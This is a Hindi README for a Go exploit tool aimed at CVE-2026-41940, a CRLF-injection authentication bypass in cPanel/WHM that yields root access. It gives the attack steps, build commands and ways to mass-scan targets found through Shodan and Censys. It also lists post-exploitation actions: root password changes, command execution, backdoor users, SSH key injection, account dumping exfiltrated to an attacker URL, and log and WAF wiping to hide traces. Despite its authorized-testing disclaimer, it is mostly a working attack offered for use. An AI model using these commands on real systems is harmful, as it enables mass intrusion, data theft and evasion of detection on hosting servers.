
CVE-2026-41940 के लिए एक्सप्लॉइट PoC, जो CRLF इंजेक्शन के माध्यम से cPanel और WHM प्रमाणीकरण बायपास है। इसमें मास स्कैनिंग, पोस्ट-एक्सप्लॉइटेशन क्रियाएँ, और अधिकृत परीक्षण के लिए एक इंटरैक्टिव शेल शामिल है।
टूल द्वारा: Ishan Oshada | GitHub
⚠️ केवल अधिकृत सुरक्षा परीक्षण के लिए। अनधिकृत उपयोग अवैध है।


CVE-2026-41940 cPanel और WHM (संस्करण < 11.110.0.97, 11.118.0.63, 11.126.0.54, 11.132.0.29, 11.134.0.20, 11.136.0.5) में एक CRLF इंजेक्शन भेद्यता है।
saveSession() फ़ंक्शन filter_sessiondata() लागू करने के बाद सत्र डेटा लिखता है, लेकिन फ़िल्टर बहुत देर से लागू किया जाता है। Authorization: Basic हेडर के अंदर CRLF (\r\n) वर्णों को इंजेक्ट करके, एक हमलावर डिस्क पर मौजूद सत्र फ़ाइल को मनमाने कुंजी-मूल्य जोड़ों (जैसे, hasroot=1, tfa_verified=1, user=root) के साथ विषाक्त कर सकता है।
जब विषाक्त सत्र बाद में लोड किया जाता है, तो cPanel/WHM बिना किसी पासवर्ड के पूर्ण रूट एक्सेस प्रदान करता है।
--verbose) – पूर्ण HTTP अनुरोध/प्रतिक्रियाएँ दिखाता हैgit clone https://github.com/ishanoshada/CVE-2026-41940-Exploit-PoC.git
cd CVE-2026-41940-Exploit-PoC
go build -o cpanel_sniper.exe main.go
go build -o cpanel_sniper main.go
chmod +x cpanel_sniper
go run main.go -u https://target.com:2087
स्रोत से निर्माण करने के बजाय, आप रिपॉजिटरी से नवीनतम स्थिर निष्पादन योग्य सीधे डाउनलोड कर सकते हैं। ये हर अपडेट के लिए स्वचालित रूप से उत्पन्न होते हैं:
नोट: यदि Linux या macOS का उपयोग कर रहे हैं, तो डाउनलोड करने के बाद निष्पादन अनुमतियाँ देना याद रखें:
# बुनियादी स्कैन
go run main.go -u https://target.com:2087
# सभी cPanel खाते सूचीबद्ध करें
go run main.go -u https://target.com:2087 -action list
# इंटरैक्टिव WHM शेल
go run main.go -u https://target.com:2087 -action shell
# urls.txt के साथ बड़े पैमाने पर स्कैन
go run main.go -l urls.txt -t 20 -o results.json
शेल के अंदर एक बार (-action shell), इन कमांड का उपयोग करें:
रिपॉजिटरी में बड़े पैमाने पर स्कैनिंग के लिए 1000 उदाहरण लक्ष्यों के साथ urls.txt शामिल है।
https://192.168.1.1:2087
https://192.168.1.2:2087
https://example1.com:2087
https://example2.com:2087
...
# बुनियादी बड़े पैमाने पर स्कैन (10 थ्रेड)
go run main.go -l urls.txt
# तेज़ बड़े पैमाने पर स्कैन (50 थ्रेड, परिणाम सहेजें)
go run main.go -l urls.txt -t 50 -o results.json
# पोस्ट-एक्सप्लॉइट क्रिया के साथ बड़े पैमाने पर स्कैन
go run main.go -l urls.txt -t 20 -action list -o hacked_servers.json
# वर्बोज़ आउटपुट के साथ बड़े पैमाने पर स्कैन
go run main.go -l urls.txt -t 10 --verbose
# बढ़े हुए टाइमआउट के साथ बड़े पैमाने पर स्कैन (धीमे नेटवर्क)
go run main.go -l urls.txt -t 30 -timeout 30
# IP रेंज उत्पन्न करें (Linux/macOS)
for i in {1..254}; do echo "https://192.168.1.$i:2087"; done > urls.txt
# IP रेंज उत्पन्न करें (Windows PowerShell)
1..254 | ForEach-Object { "https://192.168.1.$($_):2087" } > urls.txt
# Shodan से
shodan search --fields ip_str,port 'title:"WHM Login"' | awk '{print "https://"$1":"$2}' > urls.txt
# Censys से
censys search 'services.port=2087' | awk '{print "https://"$1":2087"}' > urls.txt
╔════════════════════════════════════════════════════════════════╗
║ भेद्य लक्ष्य का पता चला ║
╠════════════════════════════════════════════════════════════════╣
║ लक्ष्य: https://target.example.com:2087 ║
║ टोकन: /cpsess1234567890 ║
║ संस्करण: 11.76.0.22 ║
║ सत्र: :od2aMhg5zJeQunUy... ║
║ API URL: https://target.example.com:2087/cpsess1234567890/json-api/version ║
╚════════════════════════════════════════════════════════════════╝
[+] क्रिया: LIST
• उपयोगकर्ता: admin | डोमेन: example.com
• उपयोगकर्ता: backup | डोमेन: backup.example.com
• उपयोगकर्ता: client1 | डोमेन: client1.com
════════════════════════════════════════════════════════════════════
स्कैन पूर्ण सारांश
════════════════════════════════════════════════════════════════════
कुल स्कैन किए गए लक्ष्य: 1000
भेद्य लक्ष्य: 47
बीता समय: 125.34 सेकंड
भेद्य लक्ष्य:
────────────────────────────────────────────────────────────────
1. https://192.168.1.15:2087
टोकन: /cpsess1111111111
संस्करण: 11.76.0.22
सत्र: :od2aMhg5zJeQunUy...
2. https://192.168.1.42:2087
टोकन: /cpsess2222222222
संस्करण: 11.86.0.15
सत्र: Km2psnYR9w3rRkLU...
3. https://example.com:2087
टोकन: /cpsess3333333333
संस्करण: 11.118.0.42
सत्र: Xk9mQrNtPw3sVbLm...
════════════════════════════════════════════════════════════════════
[✓] परिणाम सहेजे गए: results.json
go build -o cpanel_sniper.exe main.go
cpanel_sniper.exe -u https://target.com:2087
go build -o cpanel_sniper main.go
chmod +x cpanel_sniper
./cpanel_sniper -u https://target.com:2087
GOOS=darwin GOARCH=amd64 go build -o cpanel_sniper_mac_intel main.go
GOOS=darwin GOARCH=arm64 go build -o cpanel_sniper_mac_m1 main.go
# Windows
GOOS=windows GOARCH=amd64 go build -o cpanel_sniper_windows.exe main.go
# Linux
GOOS=linux GOARCH=amd64 go build -o cpanel_sniper_linux main.go
# macOS Intel
GOOS=darwin GOARCH=amd64 go build -o cpanel_sniper_mac_intel main.go
# macOS M1/M2
GOOS=darwin GOARCH=arm64 go build -o cpanel_sniper_mac_m1 main.go
# Linux ARM (Raspberry Pi)
GOOS=linux GOARCH=arm64 go build -o cpanel_sniper_linux_arm64 main.go
CVE-2026-41940-Exploit-PoC/
├── README.md # दस्तावेज़ीकरण
├── bin/ # पूर्व-निर्मित मल्टी-प्लेटफ़ॉर्म निष्पादन योग्य
│ ├── windows_x64/
│ ├── linux_x64/
│ └── ...
├── main.go # मुख्य स्रोत कोड
├── urls.txt # 1000 उदाहरण लक्ष्य
├── go.mod # Go मॉड्यूल फ़ाइल
├── .gitignore # Git इग्नोर फ़ाइल
└── results.json # आउटपुट फ़ाइल (उत्पन्न)
यह टूल शैक्षिक उद्देश्यों और अधिकृत पैठ परीक्षण के लिए है।
कंप्यूटर सिस्टम तक अनधिकृत पहुँच निम्नलिखित के तहत अवैध है:
लेखक दुरुपयोग के लिए कोई दायित्व नहीं मानता। अपने जोखिम पर उपयोग करें।
इस टूल का उपयोग करके, आप सहमत हैं कि आपके पास लक्ष्य प्रणालियों का परीक्षण करने का उचित अधिकार है।
Ishan Oshada
यदि आपको यह टूल उपयोगी लगता है:
हैप्पी हैकिंग! 🚀
याद रखें: महान शक्ति के साथ महान जिम्मेदारी आती है। नैतिक रूप से उपयोग करें।
| चरण | क्रिया | विवरण |
|---|
| 1 | POST /login/?login_only=1 | गलत क्रेडेंशियल्स के साथ प्री-ऑथ सत्र कुकी का अनुरोध करें |
| 2 | GET / + CRLF Authorization हेडर | सत्र फ़ाइल को hasroot=1, user=root, आदि के साथ विषाक्त करें |
| 3 | GET /scripts2/listaccts | सत्र कैश को विषाक्त फ़ाइल को पुनः लोड करने के लिए बाध्य करें (प्रसार) |
| 4 | GET /cpsess<TOKEN>/json-api/version | रूट एक्सेस सत्यापित करें – सफलता = 200 + संस्करण डेटा |
| प्लेटफ़ॉर्म | स्थान |
|---|
| Windows (x64) | /bin/windows_x64/cpanel_sniper.exe |
| Linux (x64) | /bin/linux_x64/cpanel_sniper |
| Linux (ARM64) | /bin/linux_arm64/cpanel_sniper |
| macOS (Intel) | /bin/mac_intel/cpanel_sniper |
| macOS (M1/M2/M3) | /bin/mac_m1_m2/cpanel_sniper |
| # | उद्देश्य | कमांड |
|---|
| 1 | बुनियादी एकल लक्ष्य स्कैन | go run main.go -u https://target.com:2087 |
| 2 | सभी cPanel खाते सूचीबद्ध करें | go run main.go -u https://target.com:2087 -action list |
| 3 | रूट पासवर्ड बदलें | go run main.go -u https://target.com:2087 -action passwd -passwd "NewP@ssw0rd!2006" |
| 4 | सिस्टम कमांड निष्पादित करें | go run main.go -u https://target.com:2087 -action cmd -cmd "id && whoami" |
| 5 | सर्वर जानकारी प्राप्त करें | go run main.go -u https://target.com:2087 -action info |
| 6 | बैकडोर उपयोगकर्ता बनाएँ | go run main.go -u https://target.com:2087 -action adduser -new-user backdoor -new-domain backdoor.com -passwd "Pass123!2006" |
| 7 | API टोकन बनाएँ (गुप्त) | go run main.go -u https://target.com:2087 -action apitoken -tokenname mytoken |
| 8 | SSH कुंजी इंजेक्ट करें | go run main.go -u https://target.com:2087 -action sshkey -sshkey "ssh-rsa AAAAB3NzaC1yc2E..." |
| 9 | खाता डंप और बाहर निकालें | go run main.go -u https://target.com:2087 -action dumpacct -dumpuser victim -exfil https://attacker.com/upload |
| 10 | लॉग मिटाएँ और निशान छिपाएँ | go run main.go -u https://target.com:2087 -action wipe |
| 11 | इंटरैक्टिव WHM शेल | go run main.go -u https://target.com:2087 -action shell |
| 12 | फ़ाइल से बड़े पैमाने पर स्कैन | go run main.go -l urls.txt -t 20 -o results.json |
| 13 | परिणाम JSON में सहेजें | go run main.go -u https://target.com:2087 -o scan_results.json |
| 14 | वर्बोज़ डिबगिंग सक्षम करें | go run main.go -u https://target.com:2087 --verbose |
| 15 | अन्य टूल से पाइप | cat urls.txt | go run main.go -t 20 |
| 16 | टाइमआउट बढ़ाएँ | go run main.go -u https://target.com:2087 -timeout 30 |
| क्रिया | फ़्लैग | विवरण | गोपनीयता स्तर |
|---|
list | -action list | सभी cPanel खाते सूचीबद्ध करें | कम |
passwd | -action passwd -passwd NEWPASS | रूट पासवर्ड बदलें (शोरगुल वाला) | उच्च (पता लगाने योग्य) |
cmd | -action cmd -cmd "id" | OS कमांड निष्पादित करें | मध्यम |
info | -action info | होस्टनाम, लोड, संस्करण दिखाएँ | कम |
adduser | -action adduser -new-user U -new-domain D | बैकडोर cPanel उपयोगकर्ता बनाएँ | मध्यम |
apitoken | -action apitoken [-tokenname NAME] | स्थायी API टोकन उत्पन्न करें | बहुत कम |
sshkey | -action sshkey -sshkey "ssh-rsa..." | रूट में SSH सार्वजनिक कुंजी इंजेक्ट करें | बहुत कम |
dumpacct | -action dumpacct -dumpuser USER -exfil URL | खाता बैकअप और बाहर निकालें | मध्यम |
wipe | -action wipe | WAF अक्षम करें, लॉग साफ़ करें, इतिहास मिटाएँ | निशान छिपाएँ |
shell | -action shell | इंटरैक्टिव WHM शेल | कम |
| कमांड | विवरण | उदाहरण |
|---|
accounts | सभी cPanel खाते सूचीबद्ध करें | accounts |
passwd <pass> | रूट पासवर्ड बदलें | passwd MyNewPass123!2006 |
exec <command> | सिस्टम कमांड निष्पादित करें | exec "cat /etc/passwd" |
info | सर्वर जानकारी दिखाएँ | info |
version | cPanel संस्करण दिखाएँ | version |
help | उपलब्ध कमांड दिखाएँ | help |
exit | शेल से बाहर निकलें | exit |
| विकल्प | प्रकार | डिफ़ॉल्ट | विवरण |
|---|
-u | string | - | लक्ष्य URL (जैसे, https://example.com:2087) |
-l | string | - | लक्ष्यों वाली फ़ाइल (प्रति पंक्ति एक) |
-t | int | 10 | समवर्ती थ्रेड की संख्या |
-action | string | - | पोस्ट-एक्सप्लॉइट क्रिया |
-passwd | string | - | नया पासवर्ड (passwd/adduser के लिए) |
-cmd | string | - | निष्पादित करने के लिए कमांड (cmd क्रिया के लिए) |
-new-user | string | - | adduser क्रिया के लिए उपयोगकर्ता नाम |
-new-domain | string | - | adduser क्रिया के लिए डोमेन |
-tokenname | string | - | API टोकन के लिए नाम (apitoken क्रिया) |
-sshkey | string | - | इंजेक्ट करने के लिए सार्वजनिक SSH कुंजी (sshkey क्रिया) |
-dumpuser | string | - | बैकअप के लिए उपयोगकर्ता नाम (dumpacct क्रिया) |
-exfil | string | - | बाहर निकालने के लिए दूरस्थ URL (dumpacct क्रिया) |
-o | string | - | आउटपुट JSON फ़ाइल (मिलने पर स्वतः सहेजता है) |
--verbose | bool | false | HTTP अनुरोध/प्रतिक्रियाएँ दिखाएँ |
-h | bool | false | सहायता मेनू दिखाएँ |
| शाखा | पैच किया गया संस्करण | भेद्य < |
|---|
| 11.110 | 11.110.0.97 | 11.110.0.96 |
| 11.118 | 11.118.0.63 | 11.118.0.62 |
| 11.126 | 11.126.0.54 | 11.126.0.53 |
| 11.132 | 11.132.0.29 | 11.132.0.28 |
| 11.134 | 11.134.0.20 | 11.134.0.19 |
| 11.136 | 11.136.0.5 | 11.136.0.4 |